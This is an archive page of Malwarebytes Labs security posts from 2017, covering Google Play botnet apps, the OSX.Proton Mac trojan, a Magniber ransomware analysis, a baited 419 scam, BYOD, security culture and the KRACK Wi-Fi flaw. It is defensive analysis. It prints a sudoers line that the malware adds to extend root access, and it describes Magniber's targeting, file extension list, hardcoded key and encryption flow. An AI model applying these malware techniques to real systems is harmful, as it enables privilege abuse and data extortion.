Browsing articles in "Internet Security"
Oct 20, 2017
Comments Off on More trouble in Google Play land

More trouble in Google Play land

This is not a good week for Google, it seems.

After our mobile security experts repeatedly discovered adware on several apps on the Google Play store, our friends at Symantec have unearthed at least eight malicious apps that are found capable of adding affected mobile devices to a botnet. According to their blog post, the apps have been downloaded and installed onto 2.6 million smartphones, tablets, and possibly some IoTs.

Threat actors behind the bogus apps have banked on the popularity of Minecraft, a sandbox video game with a user base of 100 million. They specifically targeted Minecraft: Pocket Edition (PE), which launched in 2015. Symantec explained how the malicious apps work:

The app connects to a command and control (C&C) server on port 9001 to receive commands. The C&C server requests that the app open a socket using SOCKS and wait for a connection from a specified IP address on a specified port. A connection arrives from the specified IP address on the specified port, and a command to connect to a target server is issued. The app connects to the requested target server and receives a list of ads and associated metadata (ad type, screen size name). Using this same SOCKS proxy mechanism, the app is commanded to connect to an ad server and launch ad requests.

There is no functionality within the application to display ads.

Due to a large number of devices affected, it’s possible for the threat actors to also leverage them for DDoS attacks. This is not a new concept—using mobile devices to launch a crippling blow to websites and networks has been done before.

To minimize the possibility of downloading apps that are not behaving like they’re supposed to, consult our list of safe practices when using your mobile device. Meanwhile, users of Malwarebytes for Android who have updated to the latest version are already protected. We detect the malicious apps as Android/

Stay safe, everyone!

The post More trouble in Google Play land appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 20, 2017
Comments Off on Mac malware OSX.Proton strikes again

Mac malware OSX.Proton strikes again

The hackers responsible for the Mac malware OSX.Proton have struck again, this time infecting a copy of the Elmedia Player app that was being distributed from the official Eltima website. At this time, it is still unknown how long their website was providing the hijacked app.

Proton was silently added to Apple’s XProtect definitions in early March, and not much was known about it at the time. Then, in May, one of the servers responsible for distributing the popular Handbrake software was hacked, resulting in the distribution of a Proton-infected copy of Handbrake for a four-day period. Now, Eltima Software has fallen victim to a similar attack.

Researchers at ESET discovered the trojanized copy of Elmedia Player on Thursday morning, and Eltima Software eliminated the malware from their servers by that afternoon. However, an unknown number of people have already downloaded the malicious copy of Elmedia Player and will be infected with Proton.

The malicious Elmedia Player app looks completely legitimate, even when opened. This is because the Trojanized app is actually a wrapper, containing the real Elmedia Player application. When the malicious wrapper is opened, it opens the legitimate app as a cover to make it seem like everything is working as expected.

In the following screenshot, you can see the contents of the legitimate Elmedia Player app in the lefthand window, compared to the malicious wrapper app on the right.

This is a bit different than the technique used to Trojanize Handbrake. In the case of Handbrake, the software is open source, so the hackers were able to actually compile a malicious copy of the Handbrake app that installed the Proton malware, but otherwise behaved normally.

In this case, however, Elmedia Player is not open source, so the hackers changed their methods to open an untampered copy of the real application. To avoid suspicion by having two different Elmedia Player apps showing up on the Dock, the malicious wrapper app has the following setting in its Info.plist file:


This means that the malicious app is treated as more of a background process, hidden from the Dock and the Force Quit window, eliminating one potential cause for user suspicion.

The only place that the malicious application differs from the legitimate one, as with the Handbrake hack, is a password request when the app launches.

Malware researcher @noarfromspace also noticed that Eltima Software’s Folx application is also affected, which we have confirmed. Since Eltima Software has cleaned up their systems at this point, it is not known how many of their other apps may also have been affected.

The maliciously-modified Eltima apps are all signed using an Apple developer certificate issued to a “Clifton Grimm.” That certificate has been revoked at this point, rendering those apps inoperable.

Malicious behaviors

As with the variant that was dropped by the hacked copy of Handbrake (Proton.B), this variant (Proton.C) will also attempt to exfiltrate the keychains and 1Password vaults containing user passwords and other sensitive information, as well as browser information, including login credentials for those who use browser functionality to remember their passwords.

However, Proton.C will also collect a number of other pieces of data. It will exfiltrate several different cryptocurrency wallets, giving the hackers the ability to steal digital money, such as Bitcoin, from the user. It also grabs other data that could be used to connect to sensitive online resources accessible to the user.

In addition, as part of the infection process, Proton.C will add a line to the sudoers file, which manages access to root privileges:

Defaults !tty_tickets

Normally, if a user is granted root privileges in the terminal, for example, those privileges will only apply within that single terminal window (session) and nowhere else. By adding this line to the end of the sudoers file, this allows the malware to authenticate once, and root privileges are allowed across all sessions.

Am I infected?

Unfortunately, we don’t know yet how long Eltima Software’s systems have been serving up Trojanized software. However, if you have downloaded any software from Eltima Software recently, you should check to see if your system is infected. The easiest method for identifying an infection would be to install Malwarebytes for Mac, which will detect and remove Proton.C for free.

You can also check by choosing Go to Folder from the Go menu in the Finder, and entering the following path:


Then click the Go button. If the Finder complains that “The folder can’t be found,” that means you’re probably not infected—assuming, of course, that you didn’t make a mistake entering the path. This is not a method we recommend to most people, due to the possibility of human error resulting in an erroneous belief that the system is clean.

If you find an infection, be sure to delete any Eltima Software applications from your system, even if they are not detected by antivirus software, just to be completely sure. It should be safe to re-download clean copies at this point.

What happens if I’m infected?

If you are infected, the first priority is to get the malware off your system.

After you have done that, you will need to begin the far harder process of remediating the effects of the breach. You should assume that every password to every online account has been compromised, and should change them all. A good password manager, such as 1Password, will help immeasurably with this. If you’re not already using such a program, we recommend that you start now. (And don’t store the master password for your password manager in the macOS keychain!)

If you have any cryptocurrency wallets, you will need to take fast action to lock those down, before the criminals behind this malware clean you out. If you had any credit card or other financial account numbers stored in the keychain or in 1Password, contact those financial institutions immediately so that those accounts can be frozen, monitored, or changed.

For those with affected business machines, you need to alert your IT admins immediately. This malware may have given the hackers the keys needed to access some or all of your company’s internal resources, which could lead to your company suffering from a breach—possibly one that results in your company spreading another variant of Proton if you work at a software company.

If people act quickly to remediate, they can lessen the impact of this particular malware and stop the infection from spreading.

The post Mac malware OSX.Proton strikes again appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 19, 2017
Comments Off on How to create an intentional culture of security

How to create an intentional culture of security

In this day and age, companies great and small are vulnerable to potential attacks that they are exposed to every day. From insider threats to simple phishing, one is always left guessing if they know enough to handle them or are well prepared to face the risks. Educating your staff about basic computing hygiene is one thing, but ingraining in them security practices that they do almost naturally, even beyond the confines of the office, is another. The latter involves being part of a culture where people think, act, and behave the same way. And we’re not just talking about an organic culture, but one that was created with intentionality at the core.

Before going further, let’s first find out why it’s important that we create and cultivate an intentional culture of security. We’ll also name a few misconceptions surrounding security culture and attempt to clear up each one.

Why a culture of security is needed

A culture of security in the workplace had always existed, pre-computing era, although it’s mainly been about physical security. A large area of the office is off-limits to the public, and only those with an access card or proper company identification can go in and out. Not everyone has the key to the HR filing cabinets. And when computers were introduced in the business world, confidential files shared among managers and executives were (and still are) for their eyes only.

Things have changed dramatically since then. Businesses maintain the physical defenses of their assets, but are hard-pressed to stave off threats from the digital realm. There is now a need for organizations to secure their online assets, but criminals have become adept at circumventing basic protections. Regardless of this, the negative perception people have about security—it’s reactionary, it hinders one from conveniently doing their job—persists today. This negativity is a dominant hindrance in further establishing and sustaining a culture of security.

It’s important to have a strong security culture because security is a strategic necessity, whether it’s protecting the data of customers or building relationships and offering services to other business clients. As such, trust is essential. Without sufficient security present in an organization, those doing business with companies would be doubtful and uncertain that their assets are treated with importance and utmost confidentiality as they should. (Note how Equifax stock dropped dramatically after their massive breach was discovered.)

On the other hand, a company with sufficient security has the advantage over competitors that do not have one. When data and assets are protected, trust increases.

Finally, having a security culture in place makes compliance with laws and regulations easier. As regulators start imposing security practices that, frankly, should have been present in companies to begin with, organizations with a security mindset are more receptive to adopting these practices and imbibing them into the current culture.

Read: Make way for the GDPR: Is your business ready?

Misconceptions about a security culture

A culture of security could mean different things to different people. And just like any concept we strive to understand, there are misconceptions about them along the way. If left alone, these misunderstandings could persist, be passed on, or (worse) be treated as facts in the long run. We’ve identified and debunked some of them below.

  • The culture aims to maximize security. A majority of us assume that to improve on security, a company must make use of all security tools at their disposal. Again, this might work with organizations that handle information that is deemed sensitive and valuable, but it doesn’t apply to all companies. A culture aims to optimize security. This means making the most efficient use of resources that are available to them.
  • Having a culture of security in place will stop breaches dead. Unfortunately, this is not a guarantee. People, even well-meaning ones, make mistakes. And often, those errors can cost companies big. A culture of security does not create perfect security; however, it paves the way towards achieving best-possible security. This cannot be accomplished without people in the workplace supporting the concept.
  • A culture of security is IT’s responsibility. On the contrary, every member of the organization is responsible for its security, including the assets it uses, processes, and shares. Everyone plays a part, and no one is exempted. IT can put in place all the technological checks and balances to ward off attacks, but if a user mindlessly clicks on a phishing email, it’s game over. Although some may still choose to ignore culture and policy, this point doesn’t make it more valid.
  • A culture of security must start from the top. It’s a brilliant idea for senior management to not just talk the talk but also walk the walk, but culture doesn’t necessarily have to start with the higher-ups. What it needs are people committed enough to continue to nurture good security practices that are aligned with the organization’s objectives and well integrated with other cultures. This is why these committed people are dubbed champions.

Practical steps to foster a culture of cybersecurity

1. Recognize that security is seen in a negative light; thus, there is a need to help others realize that it’s actually a positive enabler of the company’s initiatives. This is especially true for companies in industries that handle a lot of sensitive personally identifiable information (e.g., banks, hospitals, and intelligence agencies). It’s true that when one thinks of security (or the lack thereof), we often think of preventing fraud, breaches, and hacking. However, trust, consistency, reliability, productivity, and predictability are also terms that we can associate with security. Champions should frame it as such.

2. Assess the current state of the organization’s security culture. Like we said earlier, a culture of security has always existed. But whether the culture is good or bad is another question entirely. Security champions within the company must discover the gaps, and then figure out how to bridge them.

3. Create a positive brand for the security culture. Champions can enlist the help of marketing in this. Think of one thing employees might gravitate to (Cat videos? Outdoor activities? Battlestar Galactica?), and use it convey a unified message to the organization. Then, to further develop the brand, tailor the message according to the benefits of security for each department. Branding can be broadcast via internal memos and newsletters, screensavers, and even posters that employees can see wherever they go.

4. Hold awareness campaigns to educate would-be champions. Here’s the twist: Don’t start on the wrong foot by, say, introducing statistics about hacking and phishing. Instead, the champion should educate their peers on what security is, what their specific roles in it are, and how accountable they are to the company’s resources (e.g., information) that they handle. If one doesn’t know how to fulfill his/her responsibility, further education may be needed.

5. Reward those who support a culture of security. This should also include decision-makers who make it a point to consider the security of information and other valuable enterprise assets before giving a plan the go signal. Although some seek monetary incentive, many do not. At the very least, the champion (and the company) must recognize and attribute a good outcome based on security mindfulness when they see one.

Oh, and one more thing

We believe and often parrot the adage “People are the weakest link.” That the security problem exists between the chair and the monitor. Sadly, this negative notion has affected how we continue to perceive and respond to our peers at work who clicked that link, to clients who are asking for support on a simple matter, even to our younger and older family members who aren’t as technologically savvy as we are. One purpose of fostering a culture of security is not to address them as the weakest link, but instead make people realize that they are our only link in security. A collective understanding that security is supposed to work for people and for the organization, not the other way around, is something that we should all aim and strive to achieve.

Other related post(s):

The post How to create an intentional culture of security appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 19, 2017
Comments Off on BYOD, why don’t you?

BYOD, why don’t you?

Bring Your Own Device (BYOD) is a policy that allows employees to bring their own devices to the workplace and use them there. At one time, this was the latest bonus to attract and keep employees happy—plus save a few bucks. Nowadays the question is more like: Is there anyone who doesn’t bring his own device (at least a smartphone) to the workplace?

But BYOD is more than just bringing your device along. The expression also implies that you can use your own device to access and use corporate resources. But what are the security issues that this policy opens up for both parties?

The risks for the company

  • People outside the company get access. Access by someone outside of the company can happen due to devices being stolen or by people leaving the company.
  • Devices leave the company environment. Outside the company environment, the devices are still carrying important information and may be used to access insecure networks elsewhere.
  • Devices might not be protected or patched. BYOD devices might not be protected as well as the devices that are under control by the companies IT department. This works both ways, since many companies have a slow patching process to keep legacy applications running and to allow for testing before patches and updates are rolled out. Either way, a discrepancy in updates and patches can result in problems for both sides.

The risks for the employee owner

  • This limits the use of the device outside the company. The employee has to be more vigilant than they might be if he didn’t use the device for company matters. For example, browsing in a coffee shop on an open network might be prohibited, or at least dangerous, on that device.
  • Who is to blame in case of leaks? Pointing the finger for who is to blame, or fearing the repercussions, can ruin a healthy work relationship. Employees might be more liable if they used a BYOD device instead of a work-issued one.
  • There might be discrepancy in patching and updates. The employee may have to wait before he patches or updates his Operating System or applications that are used in the workplace. This leaves his work and personal data vulnerable.

Mitigating the risks

To limit the downside and keep possible damage to a minimum, it helps to:

  • Have a clear policy and rules to enforce it. A well thought out policy about BYOD allows you to set rules that everyone understands—not only understand what the rules prescribe, but also why they are needed.
  • Have an active mobile device management solution. Even if there are no mobile devices owned by the company itself, there needs to be mobile device management to keep the company-controlled data and applications separated from the private ones.
  • Use strong authentication and encryption methods. A suitable method of strong authentication enables you to shut out the owners of stolen devices and terminated accounts. Encryption can also keep your communications and data safe from prying eyes.

Allowing your staff to BYOD has mutual benefits, but we recommend taking some precautions if you don’t want the downside to outweigh the good. Being aware of the potential dangers is important, but only a small part of what needs to be done. Securing personal devices at the workplace and securing workplace devices at home is equally important, as well as creating and implementing a strong cybersecurity policy that covers this type of flexibility. Take these steps and you can better enjoy a less cumbersome, more fluid work environment.

The post BYOD, why don’t you? appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 18, 2017
Comments Off on Magniber ransomware: exclusively for South Koreans

Magniber ransomware: exclusively for South Koreans

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples

Older sample

Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems with Korean language detected. The executable is pretty noisy, because it implements various tasks just by command line. Running it on the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can see also the ransom note and yet another file. Its name is the same as the part of the domain that has been generated for the particular user, and its extension is the same as the extension of the encrypted files:

To each encrypted file is added an extension that is composed of small Latin characters and is constant for the particular sample of Magniber.

The same plain-text makes the same cipher-text. This means each and every file is encrypted using exactly the same key.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version; it suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting domains that are generated by the built-in algorithm. The same domains that are used as CnC are later used for individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). In case of any other detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself

What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg 
onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm 
pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg 
aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch 
dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db 
mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp 
odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr 
crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu 
mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d 
fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr 
cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc 
dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 
fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt 
mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 
p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq 
sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb 
zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean 
bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err 
etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt 
fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf
kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man 
map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt 
psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf 
sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab 
tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt 
vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx
xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm 
apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc 
cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 
dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie 
ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx 
itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw 
jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct 
nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy 
cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf 
fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg
 gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx 
mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz 
tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb 
ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 
pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg 
ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli
 rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj 
spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip 
backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov
avi asf mpeg vob mpg wmv fla swf wav mp3 

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:documents and settingsall users 
:documents and settingsdefault user 
:documents and settingslocalservice 
:documents and settingsnetworkservice 
local settings 
publicmusicsample music 
publicpicturessample pictures 
publicvideossample videos 
tor browser 
program files (x86) 
program files 
system volume information 

How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

 The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending if the sample is running under the debugger or not (detected using time check).

Four domains are being queried for the key:

If any of them give a 16-byte long response, that means the valid key is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with the AES key hardcoded. However, it is used only as a backup if downloading the key from the CnC was for some reason impossible (that occurs also in the case if the public IP was not from Korea). The key is unique per each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

If any of them gives 16  byte long response, that means the valid key, it is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.


Similarly, the initialization vector is always hardcoded in the sample (but not downloaded). The same 16-character long string was also saved at the file beginning. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

First, the crypto context is initialized. The malware imports the key and initialization vector with the help of functions CryptImportKey, CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte long string at the beginning of the file. Then, the file is read chunk by chunk and encrypted using Windows Crypto API.


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, approaching the same targets. However, internally it has nothing in common with the Cerber and is much simpler. The only feature that makes it unique is being so picky about the targeted country. For the first time, we are seeing country checks being performed at various levels of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 18, 2017
Comments Off on 419 scammer offers USD $60 million—and a free child

419 scammer offers USD $60 million—and a free child

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

Important discourse

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project.

I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account.

Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account.

Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting has meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

anyone for quidditch?

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

A fine sport

Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

Snape or Dumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Team Snape

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do— ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

Train time

I thought he might have Googled Hogwarts Express here, but my luck holds out:

Transportation trouble

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:


To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.


Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:



The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 18, 2017
Comments Off on When an “Outstanding” rating from CNET isn’t enough

When an “Outstanding” rating from CNET isn’t enough

The editors at respected tech site CNET/ recently awarded Malwarebytes for Windows with an “outstanding” rating of 4.5 stars out of five. In the review, editor Tom McNamara recommended Malwarebytes because the scanning engine is of “high quality,” it works well with Windows 10, and does a good job of explaining processes in plain English. Malwarebytes for Windows was one of the very few security programs to earn more than four stars from both the editors and CNET/ users.

CNET Malwarebytes Windows

So you’d expect that it would be champagne, fist bumps, and free kittens all around for a job well done here at Malwarebytes Galactic HQ.

Nope. All we can think about is that half star that we didn’t get. Perfection is hardcoded into our company DNA. It has to be.

Because, the way we figure it, a cybercriminal has to be is right only once, on one computer, anywhere on this big spinning top of ours, in order to be successful. And cybercriminals are taking a lot of shots—our products detect approximately three million pieces of malware on millions of devices every day. Every day. Which essentially means our job is never done.

This is the brutal math that keeps us up at night: millions of devices to protect, zero successful malware attacks. So we’re constantly tinkering with the Malwarebytes technology to make it smarter. In fact, the next version of Malwarebytes for Windows, version 3.3, is just around the corner. It’s our best protection yet—and we set that bar very high.

Now don’t get us wrong: We’re thankful and humbled by CNET’s recognition. Four and a half stars means we’re doing a really fine job delivering a malware-free existence to our customers, but that remaining half star is on our minds, no doubt.

The post When an “Outstanding” rating from CNET isn’t enough appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 17, 2017
Comments Off on Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

How serious? If your device supports Wi-Fi, it is most likely affected. This feasible attack, dubbed KRACK, could abuse design or implementation flaws in the Wi-Fi standard, not some specific hardware. The KRACK attack, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert himself into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wireless Protection Access 2) could be impacted to some degree.

How impacted depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into re-installing an all-zero encryption key allowing full visibility into the traffic.

The good

  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.

The bad

  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive an updated firmware making them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
